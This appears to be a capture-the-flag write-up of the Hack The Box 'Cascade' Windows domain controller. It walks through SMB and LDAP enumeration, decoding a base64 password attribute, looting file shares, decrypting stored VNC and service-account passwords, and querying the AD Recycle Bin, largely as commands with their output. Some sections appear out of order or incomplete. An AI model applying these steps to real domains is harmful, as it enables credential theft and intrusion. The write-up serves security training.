$ sudo nmap -p- -sSVC -oA nmap_services 10.10.10.182 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 21:59 CEST Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 25.28% done; ETC: 22:02 (0:01:52 remaining) Nmap scan report for 10.10.10.182 Host is up (0.022s latency). Not shown: 65520 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-19 20:05:49Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 342.64 seconds
The Windows machine is using SMBv2 so a lot of tools working with SMBv1 only will
be ineffective.
For example enum4linux will be able to find info about users but will fail for
anything else.
$ enum4linux -a 10.10.10.182 ... ============================= | Users on 10.10.10.182 | ============================= index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null) index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null) index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null) index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc Name: BackupSvc Desc: (null) index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman Name: David Burman Desc: (null) index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null) index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null) index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen Name: Joseph Allen Desc: (null) index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand Name: John Goodhand Desc: (null) index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield Name: James Wakefield Desc: (null) index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null) index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson Name: Stephanie Hickson Desc: (null) index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null) index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util Name: Util Desc: (null) ... [+] Getting local group memberships: Group 'AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc Group 'Remote Management Users' (RID: 1126) has member: CASCADE\arksvc Group 'Remote Management Users' (RID: 1126) has member: CASCADE\s.smith Group 'HR' (RID: 1115) has member: CASCADE\s.hickson Group 'IT' (RID: 1113) has member: CASCADE\arksvc Group 'IT' (RID: 1113) has member: CASCADE\s.smith Group 'IT' (RID: 1113) has member: CASCADE\r.thompson Group 'Audit Share' (RID: 1137) has member: CASCADE\s.smith Group 'Data Share' (RID: 1138) has member: CASCADE\Domain Users Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\krbtgt Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Controllers Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Schema Admins Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Enterprise Admins Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Cert Publishers Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Admins Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Group Policy Creator Owners Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Read-only Domain Controllers ... [+] Getting domain group memberships: Group 'Domain Users' (RID: 513) has member: CASCADE\administrator Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson Group 'Domain Users' (RID: 513) has member: CASCADE\util Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft Group 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator Group 'Domain Guests' (RID: 514) has member: CASCADE\CascGuest ...
arksvc is in a weird group AD Recycle Bin, that may be useful later
arksvc and s.smith are in Remote Management Users so they will be able to
connect over RDP.
Then we have organization logic information:
s.hickson is in group HR group
arksvc, s.smith and r.thompson are in IT group
s.smith is in Audit Share group so will probably be able to have permission
on some network shares.
all Domain Users are in the group Data Share
Anyway enum4linux is just a poorly written wrapper around various more specific
tools such as rpcclient. So we can directly use rpcclient.
I already knew form enum4linux that s.smith is in Audit Share group but
now we know he can execute scriptPath: MapAuditDrive.vbs.
User r.thompson has a weird custom property cascadeLegacyPwd: clk0bjVldmE=
that looks like a password encoded in base64:
1 2
$ printf %s 'clk0bjVldmE=' | base64 -d rY4n5eva
There is also another attributes msDS-SupportedEncryptionTypes: 0.
By default this machine use msDS-SupportedEncryptionTypes: 31 so the accounts
will use one of those algorithm: "DES_CRC","DES_MD5","RC4","AES128","AES256".
But type 0 doesn't exist so it's maybe an hint to say no encryption is used.
Credentials are valid so we will be able to enumerate the shares with [smbclient][smbclient]:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
$ smbclient -U 'r.thompson' -L '\\10.10.10.182\' Enter WORKGROUP\r.thompson's password:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Audit$ Disk C$ Disk Default share Data Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
Let's try to see what is located in non-default shares:
$ smbclient -U 'r.thompson' '\\10.10.10.182\Data\' Enter WORKGROUP\r.thompson's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 27 04:27:34 2020 .. D 0 Mon Jan 27 04:27:34 2020 Contractors D 0 Mon Jan 13 02:45:11 2020 Finance D 0 Mon Jan 13 02:45:06 2020 IT D 0 Tue Jan 28 19:04:51 2020 Production D 0 Mon Jan 13 02:45:18 2020 Temps D 0 Mon Jan 13 02:45:15 2020
13106687 blocks of size 4096. 7797252 blocks available smb: \> recurse ON smb: \> prompt OFF smb: \> mget * NT_STATUS_ACCESS_DENIED listing \Contractors\* NT_STATUS_ACCESS_DENIED listing \Finance\* getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (30,4 KiloBytes/sec) (average 30,4 KiloBytes/sec) getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (14,6 KiloBytes/sec) (average 22,2 KiloBytes/sec) getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (11,8 KiloBytes/sec) (average 14,5 KiloBytes/sec) getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (33,1 KiloBytes/sec) (average 16,5 KiloBytes/sec) NT_STATUS_ACCESS_DENIED listing \Production\* NT_STATUS_ACCESS_DENIED listing \Temps\*
The meeting notes (Meeting_Notes_June_2018.html) contains:
1 2 3 4 5 6 7 8 9 10 11 12
From:аааааааааааааааааааааааааааааааааааааааа Steve Smith To:аааааааааааааааааааааааааааааааааааааааааааааа IT (Internal) Sent:аааааааааааааааааааааааааааааааааааааааааа 14 June 2018 14:07 Subject:аааааааааааааааааааааааааааааааааааа Meeting Notes
For anyone that missed yesterdayТs meeting (IТm looking at you Ben). Main points are below:
-- New production network will be going live on Wednesday so keep an eye out for any issues. -- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). -- The winner of the УBest GPOФ competition will be announced on Friday so get your submissions in soon.
Steve
So there is TempAdmin account with same password as admin used as a temporary
account to perform all tasks related to the network migration.
Another file is interesting IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log,
remember the ArkSvc account in AD Recycle Bin group.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 1/10/2018 15:43 [MAIN_THREAD] Validating settings... 1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied 1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5 2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 2/10/2018 15:56 [MAIN_THREAD] Validating settings... 2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc 2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local 2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local 2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0 8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 ** 8/12/2018 12:22 [MAIN_THREAD] Validating settings... 8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc 8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local 8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
This group gives you permission to read deleted AD object. Something juicy information can be found in there:
1 2 3
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft #You need to be in the "AD Recycle Bin" group of the AD to list the deleted AD objects Get-ADObject-filter'isDeleted -eq $true'-includeDeletedObjects-Properties *
So TempAdmin and ArkSvc will definitly be helpful for the EoP.
In a registry script we can find a VNC password probably for s.smith user.
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
To have metasploit loaded in a irb session, the easier is to launch msfconsole
and use the msf internal irb command.
1 2
$ msfconsole -q msf5 > irb
However for ArchLinux users, there was currently a bug
(FS#66480) preventing from being able to
laod irb from msfconsole but I fixed it upstream.
For those still experiencing this bug in some distro, a workaround is
1 2 3 4 5 6 7 8
$ msfconsole -q msf5 > irb -e '$LOAD_PATH << "/usr/lib/ruby/gems/2.7.0/gems/irb-1.2.1/lib/"' msf5 > irb [*] Starting IRB shell... [*] You are in the "framework" object
irb: warn: can't alias jobs from irb_jobs. >>
In both cases we can launch the Rex module and decrypt the password:
$ smbclient -U 'r.thompson' '\\10.10.10.182\NETLOGON\' Enter WORKGROUP\r.thompson's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 15 22:50:33 2020 .. D 0 Wed Jan 15 22:50:33 2020 MapAuditDrive.vbs A 258 Wed Jan 15 22:50:15 2020 MapDataDrive.vbs A 255 Wed Jan 15 22:51:03 2020
13106687 blocks of size 4096. 7796708 blocks available smb: \> prompt OFF smb: \> mget * getting file \MapAuditDrive.vbs of size 258 as MapAuditDrive.vbs (2,9 KiloBytes/sec) (average 2,9 KiloBytes/sec) getting file \MapDataDrive.vbs of size 255 as MapDataDrive.vbs (3,2 KiloBytes/sec) (average 3,0 KiloBytes/sec)
PS: Audit$ is not readable by r.thompson.
1 2 3 4 5 6 7 8
'MapAuditDrive.vbs OptionExplicit Dim oNetwork, strDriveLetter, strRemotePath strDriveLetter = "F:" strRemotePath = "\\CASC-DC1\Audit$" Set oNetwork = CreateObject("WScript.Network") oNetwork.MapNetworkDrive strDriveLetter, strRemotePath WScript.Quit
1 2 3 4 5 6 7 8
'MapDataDrive.vbs OptionExplicit Dim oNetwork, strDriveLetter, strRemotePath strDriveLetter = "O:" strRemotePath = "\\CASC-DC1\Data" Set oNetwork = CreateObject("WScript.Network") oNetwork.MapNetworkDrive strDriveLetter, strRemotePath WScript.Quit
SYSVOL is often a great place to find password of service accounts used in
install scripts:
$ smbclient -U 's.smith' '\\10.10.10.182\Audit$\' Enter WORKGROUP\s.smith's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 29 19:01:26 2020 .. D 0 Wed Jan 29 19:01:26 2020 CascAudit.exe A 13312 Tue Jan 28 22:46:51 2020 CascCrypto.dll A 12288 Wed Jan 29 19:00:20 2020 DB D 0 Tue Jan 28 22:40:59 2020 RunAudit.bat A 45 Wed Jan 29 00:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 07:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 07:38:38 2019 x64 D 0 Sun Jan 26 23:25:27 2020 x86 D 0 Sun Jan 26 23:25:27 2020
13106687 blocks of size 4096. 7795108 blocks available smb: \> mget RunAudit.bat Get file RunAudit.bat? y getting file \RunAudit.bat of size 45 as RunAudit.bat (0,5 KiloBytes/sec) (average 0,5 KiloBytes/sec) smb: \> prompt OFF smb: \> cd DB lsmb: \DB\> ls . D 0 Tue Jan 28 22:40:59 2020 .. D 0 Tue Jan 28 22:40:59 2020 Audit.db A 24576 Tue Jan 28 22:39:24 2020
13106687 blocks of size 4096. 7795366 blocks available smb: \DB\> mget Audit.db getting file \DB\Audit.db of size 24576 as Audit.db (150,0 KiloBytes/sec) (average 99,4 KiloBytes/sec) smb: \DB\>
RunAudit.bat (see below) gives the idea to check the DB is we miss it.
There is a DeletedUserAudit table containing the name of removed users we
saw earlier in \\CASC-DC1\\Data\IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log.
But more interesting there is a Ldap table with only one entry.
Id
uname
pwd
domain
1
ArkSvc
BQO5l5Kj9MdErXx6Q6AGOw==
cascade.local
So we got the password of ArkSvc but it's not direct base64 nor SSHA or MD5
LDAP format. I just pasted BQO5l5Kj9MdErXx6Q6AGOw== on a search engine and
found a C# script decrypting the AES
encrypted value.
The Active Directory Recycle Bin was introduced in the Windows Server 2008 R2 release. The goal of this feature was to facilitate the recovery of deleted Active Directory objects without requiring restoration of backups, restarting Active Directory Domain Services, or rebooting domain controllers. To accomplish these goals, the AD Recycle Bin introduced changes to the behavior of the Active Directory object deletion lifecycle.
And we are exactly running Windows Server 2008 R2 so that perfectly matches.
Continue reading:
On to the AD Recycle Bin object recovery process. While providing considerably more value, the AD Recycle Bin was initially hampered by the fact that it was relatively difficult to use. Prior to Windows Server 2012, viewing the contents of the Recycle Bin required the use of an LDAP tool or PowerShell. For example, this PowerShell query will return all of the deleted objects within a domain:
1
Get-ADObject-filter'isDeleted -eq $true -and name -ne "Deleted Objects"'-includeDeletedObjects
Deleted : True DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local Name : User DEL:746385f2-e3a0-4252-b83a-5a206da0ed88 ObjectClass : container ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
Deleted : True DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local Name : TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059 ObjectClass : user ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
With a command given in the article I tried to restore the TempAdmin account:
1 2 3 4 5 6 7
$ *Evil-WinRM* PS C:\Users\arksvc\Documents> Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059' Insufficient access rights to perform the operation At line:1 char:1 + Restore-ADObject -Identity 'f0cc344d-31e0-4866-bceb-a842791ca059' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject
But it seems we are denied even if ArkSvc is in the right group.
The Identity parameter specifies the Active Directory object to restore. You can identify an object by its distinguished name (DN) or GUID. You can also set the Identity parameter to an object variable such as $, or you can pass an object through the pipeline to the Identity parameter. For example, you can use the Get-ADObject cmdlet to retrieve a deleted object by specifying the IncludeDeletedObjects parameter. You can then pass the object through the pipeline to the Restore-ADObject cmdlet.
Note: You can get the distinguished names of deleted objects by using the Get-ADObject cmdlet with the -IncludedeDeletedObjects parameter specified.